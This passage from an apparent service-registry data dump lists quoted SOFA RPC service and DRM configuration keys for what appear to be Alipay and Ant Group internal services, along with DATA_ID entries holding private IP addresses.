ade.manageapi.ResponseParamManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","_CLIENTSERVICE_TEST_2_1_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcardsales.common.service.facade.PcardOrderReplaceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:zdatabus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesecurity.common.service.api.accoutsetting.AccountSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:punishcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.task.OrderMngTaskService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcalm-ww-invest-strategy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.backend.api.BackendItemDishRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaascoreng.facade.ops.ThreadMemDumpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.config.MobileCodecSitecodeRegexRuleWriteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iglobalfundcontrol.common.config.api.FundPlanDecisionConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paymentmng.service.facade.paycore.PmtBizProdCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.226.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng-priceDescAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.api.arrangement.ArrangementCacheRefreshFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.tairHitRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acmcscore.facade.CustomerDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.api.DataExportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.fiduciaryPaymentSplit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iexratecenter.service.facade.api.ExClientRateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.workflow.WorkflowPresKaConsultationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insleads.common.service.facade.remark.ContactRemarkFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:antsecurity_uctproc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:insxbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.biz.service.impl.rpc.notice.LifeNoticeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insopenprod.core.service.reindeer.WorkOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmodelcenter.common.service.api.matrix.ReportRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkdeck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.ProdRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.AccountUserRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bccomparacenter.facade.ComParaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.244.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipayplus.mobilesrc.facade.PluginReleaseTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imaspmng.common.service.facade.SopMetaFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.label.LabelConfigManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.fraudmng.ruleDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dont-load-plugin:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dmirror:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imasp.common.service.facade.ServiceModelInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.diag.common.service.facade.TicketResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.vouchercore.service.facade.api.point.PointRewardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.CrmMerchantSplitService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.robot.RobotWarningFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpensionprod.common.service.facade.PensionAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.UserModelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.common.service.facade.api.quotation.FqpQcQuotationDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundprod:name=com.alipay.fc.prodwealth.Config.fundOnShelvesProcessSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insbffweb:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlegalchain.common.service.facade.api.NdaSignConsultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.normalExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fundprod2:name=com.alipay.zcache.log.fundprod2.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.ukey.facade.UkeyInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sdaconfigsvr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.wallet.partner.common.service.facade.flow.FlowTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acmcscore.facade.ServiceRenewFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iotcore.spi.MessageSpi:1.0:mobilecodec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payboss.common.service.facade.monitor.DynamicMonitorDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpipe.zqueue:qaZQueue49:threelevel#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fininflux.common.service.facade.influx.InfluxCallbackService:1.0:exchangecore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.178.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:charityprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.taskcenter.common.service.facade.TaskAttachmentService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.policybench.common.service.facade.api.PolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.runtime.MemorySpecFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipPromoteResource.collExptDegradeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkloansupport.common.service.facade.collection.action.CollActionNoteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaxconnectplatform.service.miniapprpc.XpSceneRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbrecruit.common.service.facade.bg.RecruitBackgroundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbuservice.common.service.facade.JobFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:jianjia_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserDisputeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaoprod.common.service.facade.query.BillAlterQuery:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commandcenter.service.facade.api.DomainResultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.74.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_C_FUND_REDEEMAPPLY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ck:name=com.alipay.zdal.config.groupCluster.pmo_intl_ob_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.MerchantLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.247.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.82.87.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditint.facade.service.PcreditBearingintDecideFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.matcherauth.MatcherAuthFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.xssClientPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_CORGIUNIT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_BKGUARTRADE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_ST2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanRepayPay.corePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alideviceinfo.biz.service.DeviceAuthInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adbasiclib.ad.rpc.AdService:1.0:adexchange-gd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-trafficcardsp-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:configDeleteProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_INNERTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fininsightmng.common.service.facade.strategy.api.StrategyTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.168.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.186.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecashier.service.facade.CreateAndPayCallBackFacade:1.0:transferprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.custdpc.cluster.ClusterManagerQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uioservice.common.service.facade.api.GreaterBayAreaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.FlowCtrConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linepay.common.serivce.facade.recon.SettleSequenceMatchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ifim.biz.risk.manager.RiskEmergencyManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.account.OfficialAccountOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.agentfund.api.AftransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplaycenter.common.service.facade.api.RelationRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.assetcenter.api.AssetCenterManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.service.loan.drm.DeferOperateUtilDrm.ovdRestructureLimitSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchmobile.common.service.artisan.facade.ArtisanToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.livetradeprod.service.facade.api.FacePaySwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.common.service.facade.MobileAiFeatureDevelopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.FundNominalThemeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.EventManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.biz.service.impl.rpc.MobileQrCodeRpcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.AuthenticationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@bugscan#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.prodtrans.senior.manage.facade.SubProductConfigManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.236.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.alinode:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insopenprod.common.service.facade.api.PrizeSendApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingcore.common.service.facade.prizeexchange.InsMktPrizeExchangeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantPageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.attachment.api.InsAttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_SUB_SERVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.fundPayConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesearch.core.service.MerchantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.baitiaoprod.common.service.facade.query.BillQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.PersonalAccountLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-ordercore-executeValid#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pcardsales:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imif.opcenter.common.service.facade.crm.v2.api.CrmMerchantBankCardQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:yebscenebff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.model.script.repository.AntScriptRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.checkin.CheckInFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.assetliability.AssetLiabilityRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cssocial.common.service.facade.SinaAlipayUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.PermissionService:1.0:instopen@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.common.service.facade.EventTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserFreezeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.minidatarel.MiniDataRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprobe.biz.shared.RazorSchedulerInstanceManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsbrain.common.service.facade.spi.RecoverServiceFacade:1.0:finhadecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.lessonMaxSendMessageCountPreDayPreAction,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassetpreference.api.facade.AssetRateTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:instservicecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.71.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.vouchercore.facade.api.template.TemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:arulemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CallbackService:1.0:mobilecodec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.certifycenter.service.facade.papers.PapersFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mctlib.common.facade.intf.PipelineSchemaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accustomercore.common.service.facade.UCKernelMfaManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrcher.common.service.facade.inner.DiagnoseTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.exterface.ExterfaceFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.minicenter.common.service.facade.api.build.MiniAppBuildConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mdiscountprod.common.service.facade.voucher.api.VoucherCodeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.service.facade.ServiceGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditagreement.common.service.commonquery.PcreditMultipleAccountsRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.dal.mdata.auto.daointerface.TradeBaseReportDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.service.inspect.engine.EngineResultDispatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.solution.MerchantSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.register.RegisterSupportService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.service.GrayPublishServiceFacade:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantOperatorRelationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfquote.common.service.facade.api.AssignQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.roplib.core.model.drmdefense.DrmDefenseSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.client.SystemAppInvokeService:1.0:publichome@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.FinoutfluxQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.localcacheProvider,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.shared.drm.impl.InvestmentAssistantDrmMangerImpl.oneKeyBuyFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.drc.rm.endpoint.dispatcher.StandaloneRequestDispatcher#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilechat.common.service.facade.api.CollectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincontract.common.service.facade.security.SecurityContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fundprod:name=com.alipay.fundprod.common.service.facade.product.drm.PortfolioProdDrmConfig.queryInfoSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iinnertrans.facade.api.AccountTemplateInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.core.service.fund.api.GlobalWorkCalendarCalculateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshydelivery.common.service.facade.IsvServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.identitycloud.conf.matrix.plugin.spi.ReleaseHealingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.common.service.facade.api.PushInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.common.retrytask.spi.RetryTaskExecuteSPI:1.0:acuirecenter-couponAdviceRetryTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.frequence.TemplateMsgFrequencyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmservicehub.common.service.facade.securityexprod.SecurityScoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.console.MistQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.merchant.MerchantActingRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.agreement.VirtualCardAuthorizeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.BizPositionMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cloud.acappcore.common.service.facade.buildpack.BuildpackRegionRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zcbsalescenter.common.service.integration.fintradecenter.FintradePurchaseFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:exriskcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepromo.common.service.facade.catchcat.manage.CampPartnerManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinquotationprod.biz.service.impl.manage.MarketReportManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.specify.facade.SpecifiedArOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.96.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.acquirefront.service.facade.api.AsyncRefundTaskRetryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.147.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ifxbase.common.scheduler.SchedulerHandler:1.0:guaranteeHedgeSchedulerHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.eworkcard.EWorkCardRoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTA